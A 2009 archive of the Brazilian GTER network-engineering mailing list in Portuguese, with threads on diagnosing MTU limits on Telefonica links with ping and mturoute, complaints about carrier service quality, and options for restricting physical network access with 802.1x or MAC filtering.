<4A35976A.5060608@jarruda.com> <4A363CAB.6080908@fertimitsui.com.br> <6C07E4009BD94C9B9AF0A6B92844FFAA@servidor> <86B6353E77864FCAA9BAE2F3C1CC636B@servidor> <20090617215546.GJ79676@registro.br> Message-ID: Pra descobrir o MTU: ping -f -l 1472 gelo.fertimitsui.com.br Se o ping funcionar, ent?o MTU = 1472 + 28 sen?o: ping -f -l 1470 gelo.fertimitsui.com.br, repetindo o procedimento... ou seja, comecem tentando em 1472 que ? o m?ximo, se n?o der... diminuam at? o ponto onde o "ping" come?a a "funcionar". Depois de encontrar esse ponto, basta adiciona +28 ao resultado. Este ? o valor MTU a ser usado. Acho que d? at? pra fazer um scriptzinho de acordo com a sa?da.... 2009/6/17 Frederico A C Neves > On Wed, Jun 17, 2009 at 06:06:52PM -0300, Danton Nunes wrote: > > On Wed, 17 Jun 2009, Itamar Reis Peixoto wrote: > > > > >j? que estamos falando de MTU, no ipv6 o MTU e' negociado > automaticamente. > > > > hummm, mas pode deixar que h? bastante espa?o para fazer besteira! no > IPv4 > > tamb?m, mas tem uns cretinos que barram ICMP nos firewalls e a? num > > fununcia! > > Em 2007 o IETF concluiu o WG PMTUD justamente para endere?ar este > problema e o resultado foi o m?todo alternativo descrito na > 4821. Apesar de STD n?o encontrei refer?ncia alguma para > implementa??es o que n?o ? um bom sinal. > > Fred > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From adelmojr at gmail.com Wed Jun 17 19:23:26 2009 From: adelmojr at gmail.com (Adelmo Junior) Date: Wed, 17 Jun 2009 19:23:26 -0300 Subject: [GTER] MTU x Telefonica In-Reply-To: References: <4A33AE1B.7010106@jarruda.com> <4A363CAB.6080908@fertimitsui.com.br> <6C07E4009BD94C9B9AF0A6B92844FFAA@servidor> <86B6353E77864FCAA9BAE2F3C1CC636B@servidor> <20090617215546.GJ79676@registro.br> Message-ID: se os icmp tiver bloqueado tem uma maneira utilizando hping que vai direto no tcp (acho q at? na porta descrita) 2009/6/17 Adelmo Junior > Pra descobrir o MTU: > ping -f -l 1472 gelo.fertimitsui.com.br > > Se o ping funcionar, ent?o MTU = 1472 + 28 > sen?o: ping -f -l 1470 gelo.fertimitsui.com.br, repetindo o > procedimento... > > ou seja, comecem tentando em 1472 que ? o m?ximo, se n?o der... diminuam > at? o ponto onde o "ping" come?a a "funcionar". Depois de encontrar esse > ponto, basta adiciona +28 ao resultado. Este ? o valor MTU a ser usado. > > Acho que d? at? pra fazer um scriptzinho de acordo com a sa?da.... > > > > 2009/6/17 Frederico A C Neves > > On Wed, Jun 17, 2009 at 06:06:52PM -0300, Danton Nunes wrote: >> > On Wed, 17 Jun 2009, Itamar Reis Peixoto wrote: >> > >> > >j? que estamos falando de MTU, no ipv6 o MTU e' negociado >> automaticamente. >> > >> > hummm, mas pode deixar que h? bastante espa?o para fazer besteira! no >> IPv4 >> > tamb?m, mas tem uns cretinos que barram ICMP nos firewalls e a? num >> > fununcia! >> >> Em 2007 o IETF concluiu o WG PMTUD justamente para endere?ar este >> problema e o resultado foi o m?todo alternativo descrito na >> 4821. Apesar de STD n?o encontrei refer?ncia alguma para >> implementa??es o que n?o ? um bom sinal. >> >> Fred >> -- >> gter list https://eng.registro.br/mailman/listinfo/gter >> > > From algorges at gmail.com Wed Jun 17 21:14:19 2009 From: algorges at gmail.com (Alexandre Gorges) Date: Wed, 17 Jun 2009 21:14:19 -0300 Subject: [GTER] Plano de fidelidade internet via tv a cabo. Message-ID: Boa noite, Algu?m poderia me tirar a d?vida, quanto ao tempo m?ximo permitido pela Anatel, para planos de fidelidade de internet via tv a cabo? Quando assinei, me empurraram uma fidelidade de 18 meses. Tanto para a internet a cabo como para a assinatura da tv a cabo. Mas ouvi por ai, que a Anatel permite apenas 1 ano para fidelidade. []'s Alexandre Gorges http://algorges.blogspot.com http://www.dag.eti.br MSN/Gtalk/iCHAT/Skype/Jabber: algorges at gmail.com From danton at inexo.com.br Thu Jun 18 00:51:18 2009 From: danton at inexo.com.br (Danton Nunes) Date: Thu, 18 Jun 2009 00:51:18 -0300 (BRT) Subject: [GTER] MTU x Telefonica In-Reply-To: References: <4A33AE1B.7010106@jarruda.com> <4A35976A.5060608@jarruda.com> <4A363CAB.6080908@fertimitsui.com.br> <6C07E4009BD94C9B9AF0A6B92844FFAA@servidor> <86B6353E77864FCAA9BAE2F3C1CC636B@servidor> <20090617215546.GJ79676@registro.br> Message-ID: On Wed, 17 Jun 2009, Adelmo Junior wrote: > Pra descobrir o MTU: > ping -f -l 1472 gelo.fertimitsui.com.br que raio de ping ? esse? -l para mim ? 'preload'. se a inten??o ? fixar o tamanho de pacote a chabe que eu conhe?o ? -s. datagramas de UDP podem ser fragmentados e remontados sem problema, n?o acho que esse neg?cio de ping d? certo. exemplo: danton at phoenix:~$ /sbin/ip link show dev eth1 2: eth1: mtu 1500 qdisc pfifo_fast qlen 1000 link/ether 00:14:2a:2e:b5:b8 brd ff:ff:ff:ff:ff:ff danton at phoenix:~$ ping -c 4 -s 2500 testbed PING testbed.inexo.com.br (200.231.48.37) 2500(2528) bytes of data. 2508 bytes from testbed.inexo.com.br (200.231.48.37): icmp_seq=1 ttl=64 time=1.07 ms 2508 bytes from testbed.inexo.com.br (200.231.48.37): icmp_seq=2 ttl=64 time=1.06 ms 2508 bytes from testbed.inexo.com.br (200.231.48.37): icmp_seq=3 ttl=64 time=1.05 ms 2508 bytes from testbed.inexo.com.br (200.231.48.37): icmp_seq=4 ttl=64 time=1.05 ms --- testbed.inexo.com.br ping statistics --- 4 packets transmitted, 4 received, 0% packet loss, time 3010ms rtt min/avg/max/mdev = 1.052/1.063/1.079/0.025 ms ta?. mtu de 1500 e pings de 2500 passando na maior boa. From rubensk at gmail.com Thu Jun 18 01:04:03 2009 From: rubensk at gmail.com (Rubens Kuhl) Date: Thu, 18 Jun 2009 01:04:03 -0300 Subject: [GTER] MTU x Telefonica In-Reply-To: References: <4A33AE1B.7010106@jarruda.com> <6C07E4009BD94C9B9AF0A6B92844FFAA@servidor> <86B6353E77864FCAA9BAE2F3C1CC636B@servidor> <20090617215546.GJ79676@registro.br> Message-ID: <6bb5f5b10906172104w10fe3f0dua5ad45e46d4b777a@mail.gmail.com> 2009/6/18 Danton Nunes : > On Wed, 17 Jun 2009, Adelmo Junior wrote: > >> Pra descobrir o MTU: >> ping -f -l 1472 gelo.fertimitsui.com.br > > que raio de ping ? esse? -l para mim ? 'preload'. se a inten??o ? fixar o > tamanho de pacote a chabe que eu conhe?o ? -s. ping.exe, Redmond style... -l ? length. Rubens From gustkiller at gmail.com Wed Jun 17 19:31:59 2009 From: gustkiller at gmail.com (Gustavo Santos) Date: Wed, 17 Jun 2009 19:31:59 -0300 Subject: [GTER] MTU x Telefonica In-Reply-To: References: <4A33AE1B.7010106@jarruda.com> <6C07E4009BD94C9B9AF0A6B92844FFAA@servidor> <86B6353E77864FCAA9BAE2F3C1CC636B@servidor> <20090617215546.GJ79676@registro.br> Message-ID: <276fbe8b0906171531k46488e92r240a8314402fda7e@mail.gmail.com> Eu utilizo um programinha muito bom que ja testa do maior valor ate o que passa sem fragmenta??o. MTU ROUTE http://www.elifulkerson.com/projects/mturoute.php 2009/6/17 Adelmo Junior > se os icmp tiver bloqueado tem uma maneira utilizando hping que vai direto > no tcp (acho q at? na porta descrita) > > 2009/6/17 Adelmo Junior > > > Pra descobrir o MTU: > > ping -f -l 1472 gelo.fertimitsui.com.br > > > > Se o ping funcionar, ent?o MTU = 1472 + 28 > > sen?o: ping -f -l 1470 gelo.fertimitsui.com.br, repetindo o > > procedimento... > > > > ou seja, comecem tentando em 1472 que ? o m?ximo, se n?o der... diminuam > > at? o ponto onde o "ping" come?a a "funcionar". Depois de encontrar esse > > ponto, basta adiciona +28 ao resultado. Este ? o valor MTU a ser usado. > > > > Acho que d? at? pra fazer um scriptzinho de acordo com a sa?da.... > > > > > > > > 2009/6/17 Frederico A C Neves > > > > On Wed, Jun 17, 2009 at 06:06:52PM -0300, Danton Nunes wrote: > >> > On Wed, 17 Jun 2009, Itamar Reis Peixoto wrote: > >> > > >> > >j? que estamos falando de MTU, no ipv6 o MTU e' negociado > >> automaticamente. > >> > > >> > hummm, mas pode deixar que h? bastante espa?o para fazer besteira! no > >> IPv4 > >> > tamb?m, mas tem uns cretinos que barram ICMP nos firewalls e a? num > >> > fununcia! > >> > >> Em 2007 o IETF concluiu o WG PMTUD justamente para endere?ar este > >> problema e o resultado foi o m?todo alternativo descrito na > >> 4821. Apesar de STD n?o encontrei refer?ncia alguma para > >> implementa??es o que n?o ? um bom sinal. > >> > >> Fred > >> -- > >> gter list https://eng.registro.br/mailman/listinfo/gter > >> > > > > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From casfre at gmail.com Wed Jun 17 21:18:33 2009 From: casfre at gmail.com (casfre at gmail.com) Date: Wed, 17 Jun 2009 21:18:33 -0300 Subject: [GTER] =?iso-8859-1?q?RES=3A_seguran=E7a_de_acesso_fisico_na_rede?= In-Reply-To: <535272.71437.qm@web110202.mail.gq1.yahoo.com> References: <535272.71437.qm@web110202.mail.gq1.yahoo.com> Message-ID: Ol?, 2009/6/16 Edson Moura > > Como foi mencionado em outros emails, uma das solu??es seria adotar 802.1x desde que o switch o suporte. Este protocolo somente libera a porta de > supplicant (usu?rio ou dispositivo) se este autenticar num servidor RADIUS (ex. FreeRadius / IAS, etc) Aproveitando o ensejo (enquanto acompanho a thread), gostaria de saber se algu?m conseguiu usar 802.1x, com switches que suportam apenas EAP-MD5 e ao mesmo tempo ter senhas criptografadas no FreeRadius (seja backend LDAP, MySQL etc)? Eu n?o consegui e, por isso, at? poder levantar todos os dados novamente, suspendi o uso de 802.1x, que ? suportado por alguns switches na rede. Tamb?m tenho muito interesse nesse controle de acesso f?sico ? rede, pois tamb?m tenho essa necessidade. Obrigado. C?ssio From marcelo at valotta.com.br Thu Jun 18 07:32:13 2009 From: marcelo at valotta.com.br (Marcelo Valotta) Date: Thu, 18 Jun 2009 07:32:13 -0300 Subject: [GTER] Baixa Performance Link Telefonica [era Re: Problemas comLink Telefonica] In-Reply-To: References: <4A393802.8020303@conectcor.com.br> Message-ID: <4d607e950906180332v7714edf0r6b31806671cb0178@mail.gmail.com> Temos notado aqui que o problema ocorre desde o dia 29 de maio, mas a telefonica n?o assume tais erros os quais so ficamos sabendo apos muita pesquisa. O pior ? explicar para os clientes que a falha so ocorre em servidores fora do pais eles entram em contato com a telefonica que faz teste de ping para o terra e uol e diz para o cliente viu num tem erro. Fica dificil.... Marcelo Valotta hrrp://yesida.com 2009/6/17 Victor Benincasa > SIM! > > Telec?mica j? virou motivo de piada, falhas atr?s de falhas, desculpas > esfarrapadas, > perda de tempo e preju?zo para todos! > > Hoje ouvi uma reportagem na CBN sobre o mais novo problema da semana... > Ligaram duas vezes l?, cada atendente falou uma coisa totalmente diferente. > E > no final a Telef?nica se pronunciou alegando informa??o equivocada dos > atendentes. O caos, desinforma??o, p?ssima qualidade e desrespeito imperam > l?. > > > -- > Victor Benincasa > http://netbit.com.br > > > ----- Original Message ----- From: "Welisson" > To: > Sent: Wednesday, June 17, 2009 3:37 PM > Subject: [GTER] Baixa Performance Link Telefonica [era Re: Problemas > comLink Telefonica] > > > > Boa tarde a todos > > Caros colegas, sei que muita gente esses ?ltimos dias at? meses, tem > comentado-se muito sobre a TELEFONICA. > Ent?o gostaria de saber se algu?m mais est? sofrendo com baixa > performance da mesma, com sa?das internacionais. > > Att.. > > -- > Welisson Tom? > -- > gter list https://eng.registro.br/mailman/listinfo/gter > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From adelmojr at gmail.com Thu Jun 18 09:09:38 2009 From: adelmojr at gmail.com (Adelmo Junior) Date: Thu, 18 Jun 2009 09:09:38 -0300 Subject: [GTER] MTU x Telefonica In-Reply-To: <276fbe8b0906171531k46488e92r240a8314402fda7e@mail.gmail.com> References: <4A33AE1B.7010106@jarruda.com> <6C07E4009BD94C9B9AF0A6B92844FFAA@servidor> <86B6353E77864FCAA9BAE2F3C1CC636B@servidor> <20090617215546.GJ79676@registro.br> <276fbe8b0906171531k46488e92r240a8314402fda7e@mail.gmail.com> Message-ID: Eu acho que o mturoute tb usa icmp, o ideal ? o HPING2 mesmo. Se eu lembrar ou achar algo eu repasso.... 2009/6/17 Gustavo Santos > Eu utilizo um programinha muito bom que ja testa do maior valor ate o que > passa sem fragmenta??o. > MTU ROUTE > http://www.elifulkerson.com/projects/mturoute.php > > 2009/6/17 Adelmo Junior > > > se os icmp tiver bloqueado tem uma maneira utilizando hping que vai > direto > > no tcp (acho q at? na porta descrita) > > > > 2009/6/17 Adelmo Junior > > > > > Pra descobrir o MTU: > > > ping -f -l 1472 gelo.fertimitsui.com.br > > > > > > Se o ping funcionar, ent?o MTU = 1472 + 28 > > > sen?o: ping -f -l 1470 gelo.fertimitsui.com.br, repetindo o > > > procedimento... > > > > > > ou seja, comecem tentando em 1472 que ? o m?ximo, se n?o der... > diminuam > > > at? o ponto onde o "ping" come?a a "funcionar". Depois de encontrar > esse > > > ponto, basta adiciona +28 ao resultado. Este ? o valor MTU a ser usado. > > > > > > Acho que d? at? pra fazer um scriptzinho de acordo com a sa?da.... > > > > > > > > > > > > 2009/6/17 Frederico A C Neves > > > > > > On Wed, Jun 17, 2009 at 06:06:52PM -0300, Danton Nunes wrote: > > >> > On Wed, 17 Jun 2009, Itamar Reis Peixoto wrote: > > >> > > > >> > >j? que estamos falando de MTU, no ipv6 o MTU e' negociado > > >> automaticamente. > > >> > > > >> > hummm, mas pode deixar que h? bastante espa?o para fazer besteira! > no > > >> IPv4 > > >> > tamb?m, mas tem uns cretinos que barram ICMP nos firewalls e a? num > > >> > fununcia! > > >> > > >> Em 2007 o IETF concluiu o WG PMTUD justamente para endere?ar este > > >> problema e o resultado foi o m?todo alternativo descrito na > > >> 4821. Apesar de STD n?o encontrei refer?ncia alguma para > > >> implementa??es o que n?o ? um bom sinal. > > >> > > >> Fred > > >> -- > > >> gter list https://eng.registro.br/mailman/listinfo/gter > > >> > > > > > > > > -- > > gter list https://eng.registro.br/mailman/listinfo/gter > > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From alfredo.dalava at gmail.com Thu Jun 18 09:15:00 2009 From: alfredo.dalava at gmail.com (=?ISO-8859-1?Q?Alfredo_Dal=B4Ava_J=FAnior?=) Date: Thu, 18 Jun 2009 09:15:00 -0300 Subject: [GTER] =?iso-8859-1?q?seguran=E7a_de_acesso_fisico_na_rede?= In-Reply-To: <4A3698F5.9090804@onda.psi.br> References: <4A3698F5.9090804@onda.psi.br> Message-ID: Ja que ? complicado dar muita seguran?a e j? que a grande maioria dos clientes n?o vai querer investir em switch, e al?m disso a comunica??o entre esta??es seja desprezivel, acrescento ?s op??es dadas pelos colegas mais estas duas: 1- Todas as m?quinas com DHCP em um IP com roteamento pra lugar algum e autenticando as esta??es atrav?s de alguma VPN qualquer. 2 - Remover TCP/IP e autenticar todo mundo via PPPoE. A id?ia ? s? dar acesso ao servidor (ou ? "rede militarizada" hehe) quem tiver um login/senha. Em cima disso ainda podem existir outras pol?ticas como controle por MAC, numero de sess?es por login e tamb?m controle do hor?rio em que este login pode conectar. Al?m disso, voce pode inverter os pinos da tomada e a esta??o s? vai comunicar se voc? tiver um cabo especial (com pinagem invertida) ehheheh ou ent?o bolar algum hardware para criptografia dos dados que passam no cabo e no switch um outro que descriptografa (cable descrambler)..... ou at? mesmo criar um driver TCP/IP modificado pra dificultar o acesso......isso foi viagem... mas a viagem com certeza depende do tamanho da paran?ia, porque n?o?? []'s Alfredo 2009/6/15 Alexandre J. Correa - Onda Internet > Boa tarde !! > > Um cliente andou me questionando sobre acesso 'fisico' a rede dele, ele me > explicou a seguinte situa??o: > > - Uma pessoa conecta um notebook em alguma tomada de rede, ele tem um dhcp > na rede onde atribui ips automaticamente... esta maquina vai ficar fora do > DOMINIO da rede sem acesso a documentos etc etc.. > > a preocupa??o dele ? NAO permitir aquela maquina de maneira alguma acessar > nada, mesmo a pessoa colocando um ip manualmente... > > para este caso sugeri autentica??o via 802.1x de todas as esta??es, > incluindo o switch fazer a autentica??o em um servidor central de chaves > usando radius... > > existem outras possibilidades ? > > uma outra solu??o que ele me questionou foi: Existe uma maneira de filtrar > quais macs podem conectar fisicamente naquelas portas ? > > resumindo, ele precisa permitir conexao fisica somente a maquinas > autorizadas .. alguem conhece alguma solu??o ? > > > obrigado !! > > -- > Sds. > > Alexandre Jeronimo Correa > > Onda Internet > www.onda.net.br > IPV6 READY ! > > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From welisson at conectcor.com.br Thu Jun 18 10:39:47 2009 From: welisson at conectcor.com.br (Welisson) Date: Thu, 18 Jun 2009 10:39:47 -0300 Subject: [GTER] Baixa Performance Link Telefonica Message-ID: <4A3A43A3.7060904@conectcor.com.br> Pois ?. Esse ? o problema e ? um chamado atr?s do outro e nunca falam, nada, realmente o problema maior ? explicar para o cliente que o problema ? na operadora transito nossa. Quando v?o criar vergonha na cara e oferecer um servi?o digno? Att, -- ?Welisson Tom? From eliteservicos at eliteservicos.com.br Thu Jun 18 12:14:26 2009 From: eliteservicos at eliteservicos.com.br (=?iso-8859-1?Q?Jos=E9_Luiz_-_Elite_Automa=E7=E3o?=) Date: Thu, 18 Jun 2009 12:14:26 -0300 Subject: [GTER] Baixa Performance Link Telefonica In-Reply-To: References: Message-ID: <9A1BC152C83C492FBD7A22E4A1AD990E@eliteprincipal> Pe?a para o Rerison do suporte te atender. Se ele n?o resolver desista e use outro link. > ------------------------------ > > Message: 2 > Date: Thu, 18 Jun 2009 10:39:47 -0300 > From: Welisson > Subject: Re: [GTER] Baixa Performance Link Telefonica > To: gter at eng.registro.br > Message-ID: <4A3A43A3.7060904 at conectcor.com.br> > Content-Type: text/plain; charset=UTF-8; format=flowed > > Pois ?. > > Esse ? o problema e ? um chamado atr?s do outro e nunca falam, nada, > realmente o problema maior ? explicar para o cliente que o problema ? na > operadora transito nossa. > Quando v?o criar vergonha na cara e oferecer um servi?o digno? > > > Att, > > -- > ?Welisson Tom? > > > > > ------------------------------ > > -- > gter digest list https://eng.registro.br/mailman/listinfo/gter > > End of gter Digest, Vol 75, Issue 65 > ************************************ From alexandre at onda.psi.br Thu Jun 18 19:21:42 2009 From: alexandre at onda.psi.br (Alexandre J. Correa - Onda Internet) Date: Thu, 18 Jun 2009 19:21:42 -0300 Subject: [GTER] [off] teste Message-ID: <4A3ABDF6.3060009@onda.psi.br> TESTE :) -- Sds. Alexandre Jeronimo Correa Onda Internet www.onda.net.br IPV6 Ready ! www.ipv6.onda.net.br From eschoedler at viavale.com.br Thu Jun 18 23:58:00 2009 From: eschoedler at viavale.com.br (Eduardo Schoedler) Date: Thu, 18 Jun 2009 23:58:00 -0300 Subject: [GTER] MTU x Telefonica References: <4A33AE1B.7010106@jarruda.com><6C07E4009BD94C9B9AF0A6B92844FFAA@servidor><86B6353E77864FCAA9BAE2F3C1CC636B@servidor><20090617215546.GJ79676@registro.br><276fbe8b0906171531k46488e92r240a8314402fda7e@mail.gmail.com> Message-ID: <1B6555AE2326455E8B710B77487EEE89@admgaz.com.br> http://www.hping.org ? ----- Original Message ----- From: "Adelmo Junior" To: "Grupo de Trabalho de Engenharia e Operacao de Redes" Sent: Thursday, June 18, 2009 9:09 AM Subject: Re: [GTER] MTU x Telefonica Eu acho que o mturoute tb usa icmp, o ideal ? o HPING2 mesmo. Se eu lembrar ou achar algo eu repasso.... 2009/6/17 Gustavo Santos > Eu utilizo um programinha muito bom que ja testa do maior valor ate o que > passa sem fragmenta??o. > MTU ROUTE > http://www.elifulkerson.com/projects/mturoute.php > > 2009/6/17 Adelmo Junior > > > se os icmp tiver bloqueado tem uma maneira utilizando hping que vai > direto > > no tcp (acho q at? na porta descrita) > > > > 2009/6/17 Adelmo Junior > > > > > Pra descobrir o MTU: > > > ping -f -l 1472 gelo.fertimitsui.com.br > > > > > > Se o ping funcionar, ent?o MTU = 1472 + 28 > > > sen?o: ping -f -l 1470 gelo.fertimitsui.com.br, repetindo o > > > procedimento... > > > > > > ou seja, comecem tentando em 1472 que ? o m?ximo, se n?o der... > diminuam > > > at? o ponto onde o "ping" come?a a "funcionar". Depois de encontrar > esse > > > ponto, basta adiciona +28 ao resultado. Este ? o valor MTU a ser > > > usado. > > > > > > Acho que d? at? pra fazer um scriptzinho de acordo com a sa?da.... > > > > > > > > > > > > 2009/6/17 Frederico A C Neves > > > > > > On Wed, Jun 17, 2009 at 06:06:52PM -0300, Danton Nunes wrote: > > >> > On Wed, 17 Jun 2009, Itamar Reis Peixoto wrote: > > >> > > > >> > >j? que estamos falando de MTU, no ipv6 o MTU e' negociado > > >> automaticamente. > > >> > > > >> > hummm, mas pode deixar que h? bastante espa?o para fazer besteira! > no > > >> IPv4 > > >> > tamb?m, mas tem uns cretinos que barram ICMP nos firewalls e a? num > > >> > fununcia! > > >> > > >> Em 2007 o IETF concluiu o WG PMTUD justamente para endere?ar este > > >> problema e o resultado foi o m?todo alternativo descrito na > > >> 4821. Apesar de STD n?o encontrei refer?ncia alguma para > > >> implementa??es o que n?o ? um bom sinal. > > >> > > >> Fred > > >> -- > > >> gter list https://eng.registro.br/mailman/listinfo/gter > > >> > > > > > > > > -- > > gter list https://eng.registro.br/mailman/listinfo/gter > > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > -- gter list https://eng.registro.br/mailman/listinfo/gter From danilo at martom.com.br Thu Jun 18 14:12:20 2009 From: danilo at martom.com.br (Danilo Leandro) Date: Thu, 18 Jun 2009 14:12:20 -0300 Subject: [GTER] 0800 BRT In-Reply-To: <4d607e950906180332v7714edf0r6b31806671cb0178@mail.gmail.com> References: <4A393802.8020303@conectcor.com.br> <4d607e950906180332v7714edf0r6b31806671cb0178@mail.gmail.com> Message-ID: Pessoal, Hoje as 13:00h todos os meus 0800 da regi?o do PR com a BRT pararam de funcionar. Aparentemente agora as 14:00h alguma coisa come?ou a voltar. Preciso formalizar com o meu cliente que o problema est? na operadora, algu?m teve o mesmo problema ou sabe de algum meio oficial informando esta not?cia? Atenciosamente, Danilo Leandro Engenharia From lulyis at gmail.com Thu Jun 18 12:48:24 2009 From: lulyis at gmail.com (Lulyis) Date: Thu, 18 Jun 2009 12:48:24 -0300 Subject: [GTER] MTU x Telefonica In-Reply-To: References: <4A33AE1B.7010106@jarruda.com> <86B6353E77864FCAA9BAE2F3C1CC636B@servidor> <20090617215546.GJ79676@registro.br> <276fbe8b0906171531k46488e92r240a8314402fda7e@mail.gmail.com> Message-ID: <4201a710906180848g1059ab61nccdcd8251cf728df@mail.gmail.com> Realizamos testes com mturoute partindo de uma conex?o speed business, ip de origem 200.168.160.157, com destino ? rede da Diveo ip 200.202.116.106. Segue abaixo o resultado: C:\>mturoute 200.202.116.106 * ICMP Fragmentation is not permitted. * * Maximum payload is 10000 bytes. * - ICMP payload of 5046 bytes failed.. - ICMP payload of 2569 bytes failed.. + ICMP payload of 1330 bytes succeeded. - ICMP payload of 1949 bytes failed.. - ICMP payload of 1639 bytes failed.. - ICMP payload of 1484 bytes failed.. - ICMP payload of 1407 bytes failed.. - ICMP payload of 1368 bytes failed.. + ICMP payload of 1349 bytes succeeded. + ICMP payload of 1358 bytes succeeded. + ICMP payload of 1363 bytes succeeded. - ICMP payload of 1365 bytes failed.. + ICMP payload of 1364 bytes succeeded. + ICMP payload of 1364 bytes succeeded. Path MTU: 1392 bytes. C:\>mturoute -t 200.202.116.106 mturoute to 200.202.116.106, 30 hops max, variable sized packets * ICMP Fragmentation is not permitted. * * Maximum payload is 10000 bytes. * 1 --+-----+++-++ host: 200.168.160.129 max: 1392 bytes 2 ... (host 192.168.32.1 is not responding) 3 4 --+-----+++-++ host: 189.109.67.70 max: 1392 bytes 5 --+-----+++-++ host: 201.85.1.6 max: 1392 bytes 6 --+-----+++-++ host: 200.202.112.122 max: 1392 bytes 7 --+-----+++-++ host: 200.202.116.106 max: 1392 bytes Aparentemente a Telefonica est? limitando o MTU dos pacotes em 1364 bytes. Algu?m da telefonica nesta lista que poderia verificar ou encaminhar internamente? Se poss?vel, nos retornem no telefone 15180*100. 2009/6/18 Adelmo Junior > Eu acho que o mturoute tb usa icmp, o ideal ? o HPING2 mesmo. Se eu lembrar > ou achar algo eu repasso.... > > 2009/6/17 Gustavo Santos > > > Eu utilizo um programinha muito bom que ja testa do maior valor ate o que > > passa sem fragmenta??o. > > MTU ROUTE > > http://www.elifulkerson.com/projects/mturoute.php > > > > 2009/6/17 Adelmo Junior > > > > > se os icmp tiver bloqueado tem uma maneira utilizando hping que vai > > direto > > > no tcp (acho q at? na porta descrita) > > > > > > 2009/6/17 Adelmo Junior > > > > > > > Pra descobrir o MTU: > > > > ping -f -l 1472 gelo.fertimitsui.com.br > > > > > > > > Se o ping funcionar, ent?o MTU = 1472 + 28 > > > > sen?o: ping -f -l 1470 gelo.fertimitsui.com.br, repetindo o > > > > procedimento... > > > > > > > > ou seja, comecem tentando em 1472 que ? o m?ximo, se n?o der... > > diminuam > > > > at? o ponto onde o "ping" come?a a "funcionar". Depois de encontrar > > esse > > > > ponto, basta adiciona +28 ao resultado. Este ? o valor MTU a ser > usado. > > > > > > > > Acho que d? at? pra fazer um scriptzinho de acordo com a sa?da.... > > > > > > > > > > > > > > > > 2009/6/17 Frederico A C Neves > > > > > > > > On Wed, Jun 17, 2009 at 06:06:52PM -0300, Danton Nunes wrote: > > > >> > On Wed, 17 Jun 2009, Itamar Reis Peixoto wrote: > > > >> > > > > >> > >j? que estamos falando de MTU, no ipv6 o MTU e' negociado > > > >> automaticamente. > > > >> > > > > >> > hummm, mas pode deixar que h? bastante espa?o para fazer besteira! > > no > > > >> IPv4 > > > >> > tamb?m, mas tem uns cretinos que barram ICMP nos firewalls e a? > num > > > >> > fununcia! > > > >> > > > >> Em 2007 o IETF concluiu o WG PMTUD justamente para endere?ar este > > > >> problema e o resultado foi o m?todo alternativo descrito na > > > >> 4821. Apesar de STD n?o encontrei refer?ncia alguma para > > > >> implementa??es o que n?o ? um bom sinal. > > > >> > > > >> Fred > > > >> -- > > > >> gter list https://eng.registro.br/mailman/listinfo/gter > > > >> > > > > > > > > > > > -- > > > gter list https://eng.registro.br/mailman/listinfo/gter > > > > > -- > > gter list https://eng.registro.br/mailman/listinfo/gter > > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > -- --lulyis . ..: From emarques at diveo.net.br Thu Jun 18 09:58:24 2009 From: emarques at diveo.net.br (Everton da Silva Marques) Date: Thu, 18 Jun 2009 09:58:24 -0300 Subject: [GTER] MTU x Telefonica In-Reply-To: <20090617215546.GJ79676@registro.br> References: <4A33AE1B.7010106@jarruda.com><4A35976A.5060608@jarruda.com><4A363CAB.6080908@fertimitsui.com.br><6C07E4009BD94C9B9AF0A6B92844FFAA@servidor><86B6353E77864FCAA9BAE2F3C1CC636B@servidor> <20090617215546.GJ79676@registro.br> Message-ID: Frederico A C Neves escreveu: > > Em 2007 o IETF concluiu o WG PMTUD justamente para endere?ar este > problema e o resultado foi o m?todo alternativo descrito na > 4821. Apesar de STD n?o encontrei refer?ncia alguma para > implementa??es o que n?o ? um bom sinal. N?o ? isso? http://staff.psc.edu/jheffner/projects/mtup/ Everton From alfredo.dalava at gmail.com Thu Jun 18 10:41:29 2009 From: alfredo.dalava at gmail.com (=?ISO-8859-1?Q?Alfredo_Dal=B4Ava_J=FAnior?=) Date: Thu, 18 Jun 2009 10:41:29 -0300 Subject: [GTER] Baixa Performance Link Telefonica [era Re: Problemas comLink Telefonica] In-Reply-To: <4d607e950906180332v7714edf0r6b31806671cb0178@mail.gmail.com> References: <4A393802.8020303@conectcor.com.br> <4d607e950906180332v7714edf0r6b31806671cb0178@mail.gmail.com> Message-ID: N?o ? s? telefonica. Na Oi existe um problema em um link entre eles e a globalcrossing que est? com perda de pacotes a mais de duas semanas, impossibilitando o uso de Voip por parte de um cliente. Temos um ponto em Jundia? com link embratel. Ent?o toda conex?o praquele determinado IP ? desviado para Jundia? (pela internet mesmo) e de l? sai via Embratel. O problema ? que estas empresas que s?o muito grandes n?o t?m uma rela??o muito pr?xima dos clientes. Tratam no 0800 um cliente corporativo com 70Mbps como se fosse um cliente Velox de 300kbps. Tratam profissionais e especialistas em redes como se fossem um simples usu?rio residencial, sem conhecimento algum de redes. Se vc tem alguma reclama??o n?o tem como falar com o supervisor, com o gerente nem com o diretor da empresa. ? todo mundo "blindado" pelo 0800... []'s Alfredo 2009/6/18 Marcelo Valotta > Temos notado aqui que o problema ocorre desde o dia 29 de maio, mas a > telefonica n?o > assume tais erros os quais so ficamos sabendo apos muita pesquisa. > O pior ? explicar para os clientes que a falha so ocorre em servidores fora > do pais eles > entram em contato com a telefonica que faz teste de ping para o terra e uol > e diz para o cliente viu num tem erro. > Fica dificil.... > > Marcelo Valotta > hrrp://yesida.com > > 2009/6/17 Victor Benincasa > > > SIM! > > > > Telec?mica j? virou motivo de piada, falhas atr?s de falhas, desculpas > > esfarrapadas, > > perda de tempo e preju?zo para todos! > > > > Hoje ouvi uma reportagem na CBN sobre o mais novo problema da semana... > > Ligaram duas vezes l?, cada atendente falou uma coisa totalmente > diferente. > > E > > no final a Telef?nica se pronunciou alegando informa??o equivocada dos > > atendentes. O caos, desinforma??o, p?ssima qualidade e desrespeito > imperam > > l?. > > > > > > -- > > Victor Benincasa > > http://netbit.com.br > > > > > > ----- Original Message ----- From: "Welisson" > > > To: > > Sent: Wednesday, June 17, 2009 3:37 PM > > Subject: [GTER] Baixa Performance Link Telefonica [era Re: Problemas > > comLink Telefonica] > > Caros colegas, sei que muita gente esses ?ltimos dias at? meses, tem > > comentado-se muito sobre a TELEFONICA. > > Ent?o 